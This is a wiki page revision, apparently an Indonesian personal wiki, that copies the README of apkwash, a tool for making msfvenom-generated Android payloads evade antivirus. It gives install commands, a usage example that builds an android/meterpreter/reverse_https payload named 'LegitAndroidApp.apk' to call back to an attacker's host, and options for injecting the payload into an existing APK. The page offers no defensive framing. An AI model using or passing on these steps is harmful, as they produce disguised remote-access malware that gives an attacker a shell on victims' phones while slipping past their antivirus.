Difference between revisions of "MSF: apkwash untuk mengelabuhi antivirus"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "sumber: https://github.com/jbreed/apkwash apkwash Android APK Antivirus evasion for msfvenom generated payloads. Tested on Kali linux rolling. Setup: apt-get update && a...")
 
 
Line 44: Line 44:
  
 
* https://github.com/jbreed/apkwash
 
* https://github.com/jbreed/apkwash
 +
* https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/

Latest revision as of 13:11, 1 June 2017

sumber: https://github.com/jbreed/apkwash


apkwash

Android APK Antivirus evasion for msfvenom generated payloads.

Tested on Kali linux rolling.

Setup:

apt-get update && apt-get dist-upgrade
chmod +x apkwash
mv apkwash /usr/local/bin/.

On first run:

  • Downloads and places apktool.jar in the user's /usr/local/bin directory
  • Generates debug keystore for signing. Places it in ~/.android/


Usage Example:

apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk

Output:

<LegitAndroidApp>.apk & <LegitAndroidApp>.listener

Default values:

payload=android/meterpreter/reverse_https
LHOST=<eth0 IP address>
LPORT=443
output=AndroidService.apk

Options

-p | --payload <payload> This sets the payload to be generated by msfvenom.
-o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | --original <infile.apk> Input APK to inject the payload into (later update).
-g | --generate Generate a payload using defaults
-n | --newkey Generate a new debug key before signing
-v | --verbose Don't mask output of commands
-d | --debug Leaves the /tmp/payload files in place for review
-h | --help Help information


Referensi